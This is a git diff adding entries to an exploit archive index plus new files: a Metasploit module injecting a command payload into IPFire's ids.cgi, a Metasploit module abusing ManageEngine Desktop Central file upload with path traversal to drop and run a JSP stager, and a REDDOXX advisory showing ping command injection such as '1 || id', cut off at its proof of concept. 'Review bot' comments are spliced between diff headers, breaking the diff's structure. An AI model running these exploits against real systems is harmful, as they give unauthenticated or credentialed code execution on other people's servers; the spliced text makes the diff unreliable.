diff --git a/files.csv b/files.csv
index fd18cfab3..02c939048 100644
--- a/files.csv
+++ b/files.csv
@@ -3329,7 +3329,7 @@ id,file,description,date,author,platform,type,port
 25164,platforms/linux/dos/25164.txt,"Gaim 1.1.3 - File Download Denial of Service",2005-02-25,"Randall Perry",linux,dos,0
 25165,platforms/multiple/dos/25165.c,"Stormy Studios KNet 1.x - Remote Buffer Overflow",2005-02-26,Expanders,multiple,dos,0
 25171,platforms/multiple/dos/25171.txt,"MercurySteam Scrapland Game Server 1.0 - Remote Denial of Service",2005-02-28,"Luigi Auriemma",multiple,dos,0
-40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642 /3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0
+40819,platforms/linux/dos/40819.c,"Linux Kernel 2.6.32-642/3.16.0-4 - 'inode' Integer Overflow",2016-11-23,"Todor Donev",linux,dos,0
 40820,platforms/windows/dos/40820.txt,"UCanCode - Multiple Vulnerabilities",2016-11-23,shinnai,windows,dos,0
 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0
 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0
@@ -5612,6 +5612,14 @@ id,file,description,date,author,platform,type,port
 42336,platforms/windows/dos/42336.html,"Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption",2017-07-18,"Google Security Research",windows,dos,0
 42337,platforms/windows/dos/42337.html,"Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion",2017-07-18,"Google Security Research",windows,dos,0
 42338,platforms/windows/dos/42338.cpp,"Microsoft Windows Kernel - 'IOCTL 0x120007 (NsiGetParameter)' nsiproxy/netio Pool Memory Disclosure",2017-07-18,"Google Security Research",windows,dos,0
+42360,platforms/multiple/dos/42360.html,"WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
+42361,platforms/multiple/dos/42361.html,"WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
+42362,platforms/multiple/dos/42362.html,"WebKit - 'WebCore::Node::nextSibling' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
+42363,platforms/multiple/dos/42363.html,"WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow",2017-07-24,"Google Security Research",multiple,dos,0
+42364,platforms/multiple/dos/42364.html,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
+42365,platforms/multiple/dos/42365.html,"WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
+42366,platforms/multiple/dos/42366.html,"WebKit - 'WebCore::Node::getFlag' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
+42367,platforms/multiple/dos/42367.html,"WebKit - 'WebCore::getCachedWrapper' Use-After-Free",2017-07-24,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 
'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8179,7 +8187,7 @@ id,file,description,date,author,platform,type,port
 24757,platforms/linux/local/24757.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0
 24758,platforms/linux/local/24758.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0
 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0
-24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - ScsiAccess Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
+24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0
 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote",2013-03-25,Dr_IDE,windows,local,0
 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0
@@ -8965,8 +8973,8 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access)",2016-10-19,"Phil Oester",linux,local,0
-40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (PoC) (Write Access Method)",2016-10-19,"Phil Oester",linux,local,0
+40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (SUID Method)",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - Local Buffer Overflow (SEH)",2016-10-25,n30m1nd,windows,local,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
@@ -8980,7 +8988,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
-40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition (PoC) (Write Access)",2016-10-26,"Phil Oester",linux,local,0
+40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition (PoC) (Write Access Method)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@@ -8990,8 +8998,8 @@ id,file,description,date,author,platform,type,port
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
-40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
-40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
+40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-28,FireFart,linux,local,0
+40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)",2016-11-27,"Gabriele Bonacini",linux,local,0
 40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0
 40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
 40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
@@ -9137,6 +9145,8 @@ id,file,description,date,author,platform,type,port
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
+42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
+42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15684,6 +15694,9 @@ id,file,description,date,author,platform,type,port
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
+42354,platforms/windows/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,"Mohamed Hamdy",windows,remote,0
+42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
+42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38157,3 +38170,7 @@ id,file,description,date,author,platform,type,port
 42347,platforms/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' Parameter SQL Injection",2017-07-20,Teng,php,webapps,0
 42351,platforms/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps,0
 42353,platforms/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps,0
+42358,platforms/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",java,webapps,0
+42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0
+42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
+42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
diff --git a/platforms/cgi/remote/42369.rb b/platforms/cgi/remote/42369.rb
new file mode 100755
index 000000000..4ce01c788
--- /dev/null
+++ b/platforms/cgi/remote/42369.rb
@@ -0,0 +1,119 @@
+##
+## This module requires Metasploit: https://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Msf::Exploit::Remote::HttpClient
+
+ Rank = ExcellentRanking
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'IPFire proxy.cgi RCE',
+ 'Description' => %q(
+ IPFire, a free linux based open source firewall distribution,
+ version < 2.19 Update Core 110 contains a remote command execution
+ vulnerability in the ids.cgi page in the OINKCODE field.
+ ),
+ 'Author' =>
+ [
+ 'h00die ', # module
+ '0x09AL' # discovery
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '42149' ]
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Privileged' => false,
+ 'DefaultOptions' => { 'SSL' => true },
+ 'Arch' => [ ARCH_CMD ],
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'perl awk openssl'
+ }
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic Target', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 09 2017'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+ OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+ Opt::RPORT(444)
+ ]
+ )
+ end
+
+ def check
+ begin
+ # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+ # after a chat with @bcoles in IRC.
+ res = send_request_cgi(
+ 'uri' => '/cgi-bin/pakfire.cgi',
+ 'method' => 'GET',
+ 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+ )
+
+ if res && res.code == 200
+ /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body
+ end
+ if version.nil? || update.nil? 
|| !Gem::Version.correct?(version)
+ vprint_error('No Recognizable Version Found')
+ CheckCode::Safe
+ elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110
+ CheckCode::Appears
+ else
+ vprint_error('Version and/or Update Not Supported')
+ CheckCode::Safe
+ end
+ rescue ::Rex::ConnectionError
+ print_error("Connection Failed")
+ CheckCode::Safe
+ end
+ end
+
+ def exploit
+ begin
+ # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+ # after a chat with @bcoles in IRC.
+ vprint_status('Sending request')
+ res = send_request_cgi(
+ 'uri' => '/cgi-bin/ids.cgi',
+ 'method' => 'POST',
+ 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+ 'headers' =>
+ {
+ 'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+ },
+ 'vars_post' => {
+ 'ENABLE_SNORT_GREEN' => 'on',
+ 'ENABLE_SNORT' => 'on',
+ 'RULES' => 'registered',
+ 'OINKCODE' => "`#{payload.encoded}`",
+ 'ACTION' => 'Download new ruleset',
+ 'ACTION2' => 'snort'
+ }
+ )
+
+ # success means we hang our session, and wont get back a response, so just check we get a response back
+ if res && res.code != 200
+ fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
+ end
+ rescue ::Rex::ConnectionError
+ fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+ end
+ end
+end
\ No newline at end of file
diff --git a/platforms/java/webapps/42358.rb b/platforms/java/webapps/42358.rb
new file mode 100755
index 000000000..ddde1273b
--- /dev/null
+++ b/platforms/java/webapps/42358.rb
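Review bot: In `check`, a rejected login on `/cgi-bin/pakfire.cgi` (wrong USERNAME/PASSWORD yields a non-200, so the regex never runs) falls through to the `version.nil?` branch and is reported as `CheckCode::Safe`, which tells the operator the host is not vulnerable when it was never inspected; add `return CheckCode::Unknown if res && res.code == 401` with a `vprint_error('Authentication failed - check USERNAME/PASSWORD')` ahead of the version test. The description says `< 2.19 Update Core 110` while the test accepts `update.to_i <= 110` as Appears, so one of the two is off by one against the referenced EDB 42149 and should be reconciled. As rendered here the version regex reads `(?[\d.]{4})` and `(?[\d]+)`, which is not valid Ruby; presumably the named groups `(?<version>…)` and `(?<update>…)` were stripped in this listing, but since `version` and `update` only come into existence through those named captures the committed file is worth confirming. The module `'Name'` also says `proxy.cgi` although the request goes to `ids.cgi`.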
@@ -0,0 +1,230 @@
+# Exploit Title: ManageEngine Desktop Central 10 Build 100087 RCE
+# Date: 24-07-2017
+# Software Link: https://www.manageengine.com/products/desktop-central/
+# Exploit Author: Kacper Szurek
+# Contact: https://twitter.com/KacperSzurek
+# Website: https://security.szurek.pl/
+# CVE: CVE-2017-11346
+# Category: remote
+
+1. Description
+
+When uploading a file, the `FileUploadServlet` class does not check the user-controlled `fileName` parameter using `hasVulnerabilityInFileName` function.
+
+This allows a remote attacker to create a malicious file and place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM.
+
+https://security.szurek.pl/manageengine-desktop-central-10-build-100087-rce.html
+
+2. Proof of Concept
+
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "ManageEngine Desktop Central 10 FileUploadServlet fileName RCE Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in ManageEngine Desktop Central 10. When
+ uploading a file, the FileUploadServlet class does not check the user-controlled
+ fileName parameter. This allows a remote attacker to create a malicious file and place
+ it under a directory that allows server-side scripts to run,
+ which results in remote code execution under the context of SYSTEM.
+
+ This exploit was successfully tested on version 10, build 100087. 
+
+ Exploit code based on https://www.exploit-db.com/exploits/38982/
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Kacper Szurek' ],
+ 'References' =>
+ [
+ [ 'URL', 'https://security.szurek.pl/manageengine-desktop-central-10-build-100087-rce.html' ]
+ ],
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'ManageEngine Desktop Central 10 on Windows', {} ]
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00"
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => "July 24 2017",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path for ManageEngine Desktop Central', '/']),
+ Opt::RPORT(8020)
+ ], self.class)
+ end
+
+ def jsp_drop_bin(bin_data, output_file)
+ jspraw = %Q|<%@ page import="java.io.*" %>\n|
+ jspraw << %Q|<%\n|
+ jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+ jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+ jspraw << %Q|int numbytes = data.length();\n|
+
+ jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+ jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+ jspraw << %Q|{\n|
+ jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
+ jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
+ jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
+ jspraw << %Q| comb <<= 4;\n|
+ jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
+ jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
+ jspraw << %Q|}\n|
+
+ jspraw << %Q|outputstream.write(bytes);\n|
+ jspraw << %Q|outputstream.close();\n|
+ jspraw << %Q|%>\n|
+
+ jspraw
+ end
+
+ def jsp_execute_command(command)
+ jspraw = %Q|<%@ page import="java.io.*" %>\n|
+ jspraw << %Q|<%\n|
+ jspraw << %Q|try {\n|
+ jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
+ jspraw << %Q|} catch (IOException ioe) { }\n|
+ jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
+ jspraw << %Q|%>\n|
+
+ jspraw
+ end
+
+ def get_jsp_stager
+ exe = 
generate_payload_exe(code: payload.encoded)
+ jsp_fname = "#{Rex::Text.rand_text_alpha(5)}.jsp"
+
+ register_files_for_cleanup("../webapps/DesktopCentral/jspf/#{jsp_fname}")
+
+ {
+ jsp_payload: jsp_drop_bin(exe, jsp_fname) + jsp_execute_command(jsp_fname),
+ jsp_name: jsp_fname
+ }
+ end
+
+ def get_build_number(res)
+ inputs = res.get_hidden_inputs
+ inputs.first['buildNum']
+ end
+
+ def get_html_title(res)
+ html = res.body
+ n = ::Nokogiri::HTML(html)
+ x = n.xpath('//title').text
+ end
+
+ def check
+ uri = normalize_uri(target_uri.path, '/configurations.do')
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ unless res
+ print_error("Connection timed out")
+ return Exploit::CheckCode::Unknown
+ end
+
+ build_number = get_build_number(res)
+ if build_number.to_s.empty?
+ print_error("Cannot find build number")
+ else
+ print_status("Found build number: #{build_number}")
+ end
+
+ html_title = get_html_title(res)
+
+ if html_title.to_s.empty?
+ print_error("Cannot find title")
+ else
+ print_status("Found title: #{html_title}")
+ end
+
+ if build_number.to_i <= 100087
+ return Exploit::CheckCode::Appears
+ elsif /ManageEngine Desktop Central 10/ === html_title
+ return Exploit::CheckCode::Detected
+ end
+
+
+ Exploit::CheckCode::Safe
+ end
+
+ def upload_jsp(stager_info)
+ uri = normalize_uri(target_uri.path, 'fileupload')
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'ctype' => 'application/octet-stream',
+ 'encode_params' => false,
+ 'data' => stager_info[:jsp_payload],
+ 'vars_get' => {
+ 'action' => 'HelpDesk_video',
+ 'computerName' => Rex::Text.rand_text_alpha(rand(10)+5),
+ 'resourceId' => 1,
+ 'customerId' => 1,
+ 'fileName' => "\\..\\..\\..\\..\\jspf\\#{stager_info[:jsp_name]}"
+ }
+ })
+
+ if res.nil? 
+ fail_with(Failure::Unknown, "Connection timed out while uploading to #{uri}")
+ elsif res && res.code != 200
+ fail_with(Failure::Unknown, "The server returned #{res.code}, but 200 was expected.")
+ end
+ end
+
+ def exec_jsp(stager_info)
+ uri = normalize_uri(target_uri.path, "/jspf/#{stager_info[:jsp_name]}")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ if res.nil?
+ fail_with(Failure::Unknown, "Connection timed out while executing #{uri}")
+ elsif res && res.code != 200
+ fail_with(Failure::Unknown, "Failed to execute #{uri}. Server returned #{res.code}")
+ end
+ end
+
+ def exploit
+ print_status("Creating JSP stager")
+ stager_info = get_jsp_stager
+
+ print_status("Uploading JSP stager #{stager_info[:jsp_name]}...")
+ upload_jsp(stager_info)
+
+ print_status("Executing stager...")
+ exec_jsp(stager_info)
+ end
+
+end
+
+3. Solution:
+
+https://www.manageengine.com/products/desktop-central/remote-code-execution.html
\ No newline at end of file
diff --git a/platforms/json/webapps/42371.txt b/platforms/json/webapps/42371.txt
new file mode 100755
index 000000000..d9ef8fce0
--- /dev/null
+++ b/platforms/json/webapps/42371.txt
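Review bot: `check` reports `CheckCode::Appears` for any target whose build number cannot be read, because `build_number.to_i` on an empty string is `0` and `0 <= 100087` holds even though the preceding branch just printed "Cannot find build number"; the guard should be `if !build_number.to_s.empty? && build_number.to_i <= 100087`. `get_build_number` also dereferences `inputs.first['buildNum']` with no nil check, so a page with no hidden inputs raises `NoMethodError` instead of returning nil, which `inputs.first && inputs.first['buildNum']` avoids. `jsp_drop_bin(exe, jsp_fname)` writes the PE to a file named `jsp_fname` relative to the server process's working directory, but only `../webapps/DesktopCentral/jspf/#{jsp_fname}` is registered with FileDropper, so the dropped binary is presumably left on disk after the session closes — register that path as well. The `chmod +x` exec in `jsp_execute_command` is dead code on a `'Platform' => 'win'` target and only survives because its `IOException` is swallowed.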
@@ -0,0 +1,187 @@
+Advisory: Remote Command Execution as root in REDDOXX Appliance
+
+RedTeam Pentesting discovered a remote command execution vulnerability
+in the REDDOXX appliance software, which allows attackers to execute
+arbitrary command with root privileges while unauthenticated.
+
+Details
+=======
+
+Product: REDDOXX Appliance
+Affected Versions: <= Build 2032 / v2.0.625
+Fixed Versions: Version 2032 SP2
+Vulnerability Type: Remote Command Execution
+Security Risk: high
+Vendor URL: https://www.reddoxx.com/
+Vendor Status: patch available
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-009
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+Introduction
+============
+
+"REDDOXX is a leading supplier of solutions for e-mail archiving,
+encrypted and digitally signed e-mail traffic as well as spam
+protection. Our focus is on technological innovation: taking our cue
+from our clientsâ?? requirements our competent and quality-conscious
+employees strive to offer you the best possible products at all times.
+Using stringent quality standards and proven processes we keep
+developing our company and products continuously, with the goal of
+continuous improvement."
+
+(from the vendor's homepage)
+
+More Details
+============
+
+The administrative interface of the REDDOXX appliance [0] offers several
+diagnostic tools in the "Diagnostic Center". Ping is one of these tools.
+The interface for this tool contains two input fields, which allow users
+to specify a target host and a packet count. Through the ISO provided on
+the vendor's homepage [1], it was possible to analyze how these commands
+are embedded into the command-line of the ping command:
+
+------------------------------------------------------------------------
+
+function ExecuteDiag($parameter)
+{
+// Here we do the main thing ...
+$cmd = "ping '" . $parameter->targetHost . "' -c " . 
$parameter->count;
+
+$this->PrintHeader();
+$this->PrintHeadLine(array('Result Message', 'Status'));
+$this->PrintOut("");
+
+$this->PrintOut("
");
+passthru($cmd, $rc);
+$this->PrintOut("
");
+
+$this->PrintStatus($rc);
+$this->PrintOut("");
+$this->PrintEnd();
+
+$result = new stdClass;
+$result->ResultCode = $rc;
+$result->MessageText = "";
+
+$this->SaveResult($result);
+}
+------------------------------------------------------------------------
+
+As can be seen in the listing above, the parameters are embedded into a
+string stored in the variable $cmd. The target host parameter is
+surrounded with single quotes, while the count parameter is not.
+
+Before the parameters are actually embedded into the ping command-line
+however, the following function performs a check for "illegal
+characters":
+
+------------------------------------------------------------------------
+
+public static function CheckShellParameter($parameter, $key = "")
+{
+if (!is_array($parameter))
+$parameter = array($parameter);
+
+foreach ($parameter as $value) {
+if (preg_match("/[';<>\"]/", $value)) {
+$paramNameMsg = "";
+if ($key)
+$paramNameMsg = " in parameter '$key'";
+throw new Exception("Invalid value" . $paramNameMsg . ". Illegal characters found.", 1);
+}
+}
+}
+------------------------------------------------------------------------
+
+These are characters, which can be used to append additional commands to
+the command line. While this check prevents certain kinds of attacks, it
+is incomplete and can therefore be bypassed. For example, && (AND) and
+|| (OR) operators can still be used to append additional commands to the
+command-line. Submitting a count target host of "127.0.0.1" and a count
+of "1 || id" leads to the following command-line being passed to the PHP
+passthru() function and executed:
+
+------------------------------------------------------------------------
+
+ping '127.0.0.1' -c 1 || id
+------------------------------------------------------------------------
+
+This causes the command "id" to be executed after the execution of the
+ping command is completed. 
+
+Proof of Concept
+================
+
+The following curl command-lines can be used to trigger the
+vulnerability.
+
+First, the diagnose function ping is called as follows:
+
+------------------------------------------------------------------------
+
